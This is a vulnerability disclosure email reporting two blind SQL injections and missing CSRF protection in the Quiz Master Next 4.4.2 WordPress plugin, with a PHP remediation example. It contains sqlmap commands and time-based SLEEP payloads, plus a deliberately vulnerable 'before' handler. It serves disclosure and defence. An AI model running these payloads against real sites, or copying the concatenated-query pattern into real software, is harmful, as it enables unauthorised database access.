Subject: Blind SQL injections in Quiz Master Next 4.4.2
Date: Thu, 16 Jul 2015 13:54:30 +0200

Hello,

Plugin: Quiz Master Next 4.4.2 https://wordpress.org/plugins/quiz-master-next/

Authenticated users (for example, editors) can execute arbitrary SQL statements; in addition, the affected forms have no CSRF protection.

1. SQL injection (mlw_options_tools_tab_content())

Method: POST
URL: http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=tools
Vulnerable parameter: mlw_reset_quiz_id

Example PHP callstack:

  mlw_options_tools_tab_content   [/quiz-master-next/php/qmn_options_tools_tab.php:34]
  wpdb::query


Verification:

sqlmap --cookie "..." --dbms mysql --data "mlw_reset_quiz_stats=confirmation&mlw_reset_quiz_id=1" -u "http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=tools" -p mlw_reset_quiz_id

...
Parameter: mlw_reset_quiz_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: mlw_reset_quiz_stats=confirmation&mlw_reset_quiz_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))uqUv)
...


2. SQL injection (mlw_options_text_tab_content())

Method: POST
URL: http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=text
Vulnerable parameter: quiz_id

Example PHP callstack:

  mlw_options_text_tab_content   [/quiz-master-next/php/qmn_options_text_tab.php:52]
  wpdb::query


Verification:

sqlmap --cookie "..." --dbms mysql --data "save_templates=confirmation&quiz_id=1" -u "http://localhost/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1&tab=text" -p quiz_id

...
Parameter: quiz_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: save_templates=confirmation&quiz_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YUSm)
...

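For maintainers reading this: the root cause in both findings is a POST value reaching wpdb::query without a prepared statement, on a form that carries no nonce. The snippet below is an added illustration of that pattern and of a hardened handler; it is not the plugin's own code, and the table name, function names and nonce action are hypothetical.

```php
<?php
// Added illustrative example (not Quiz Master Next's code). The table
// "example_quiz_results", the function names and the nonce action are
// hypothetical placeholders.

// BEFORE (the pattern the report describes): the POST value is concatenated
// into the SQL string and nothing ties the request to a user-initiated action.
function example_reset_quiz_stats_vulnerable() {
    global $wpdb;
    if ( isset( $_POST['mlw_reset_quiz_stats'] ) ) {
        $quiz_id = $_POST['mlw_reset_quiz_id'];
        $wpdb->query( "UPDATE {$wpdb->prefix}example_quiz_results SET hits = 0 WHERE quiz_id = " . $quiz_id );
    }
}

// AFTER: nonce check (CSRF), capability check, integer coercion, and a
// prepared statement so the submitted value can only ever be a number.
function example_reset_quiz_stats_hardened() {
    global $wpdb;
    if ( ! isset( $_POST['mlw_reset_quiz_stats'] ) ) {
        return;
    }
    // Dies unless the request carries the nonce emitted by example_reset_form().
    check_admin_referer( 'example_reset_quiz_stats', 'example_reset_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $quiz_id = absint( $_POST['mlw_reset_quiz_id'] ); // non-numeric input becomes 0
    if ( 0 === $quiz_id ) {
        wp_die( 'Invalid quiz id.' );
    }
    $sql = $wpdb->prepare(
        "UPDATE {$wpdb->prefix}example_quiz_results SET hits = 0 WHERE quiz_id = %d",
        $quiz_id
    );
    $wpdb->query( $sql );
}

// Form side: emit the nonce that the hardened handler verifies.
function example_reset_form( $quiz_id ) {
    echo '<form method="post">';
    wp_nonce_field( 'example_reset_quiz_stats', 'example_reset_nonce' );
    echo '<input type="hidden" name="mlw_reset_quiz_id" value="' . esc_attr( absint( $quiz_id ) ) . '">';
    echo '<input type="submit" name="mlw_reset_quiz_stats" value="confirmation">';
    echo '</form>';
}
```

The same three changes (nonce, capability check, %d placeholder via $wpdb->prepare) apply to the quiz_id handling in finding 2.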

--
Regards,
Marcin Probola,